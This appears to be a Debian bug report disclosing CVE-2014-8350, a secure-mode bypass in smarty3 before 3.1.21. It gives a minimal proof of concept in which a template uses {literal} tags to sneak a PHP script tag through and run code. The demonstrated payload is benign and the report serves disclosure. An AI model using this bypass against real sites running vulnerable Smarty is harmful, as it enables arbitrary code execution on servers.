smarty3: CVE-2014-8350: secure mode bypass

Package: smarty3
Version: All below 3.1.21
Severity: important

Smarty secure mode should allow untrusted users to write templates,
without allowing them to execute arbitrary PHP code. However, all
smarty3 versions in Debian (sid, Jessie, stable, oldstable) currently
has a security hole allowing arbitrary PHP code execution if you can
edit templates.

Example:

test.php:
<?php
require_once('/home/thue/smarty/libs/SmartyBC.class.php');
$smarty = new Smarty();

$smarty->setTemplateDir('templates/');
$smarty->setCompileDir('templates_c/');
$smarty->enableSecurity();
$smarty->force_compile = true;
$tpl = $smarty->createTemplate('test.tpl');
$tpl->compileTemplateSource();
$smarty->display('test.tpl');
?>

templates/test.tpl:
{literal}<{/literal}script language=php>echo 1+1;</script>

If secure mode worked, that should output
   <script language=php>echo 1+1;</script>
In smarty3<3.1.21 it outputs
   2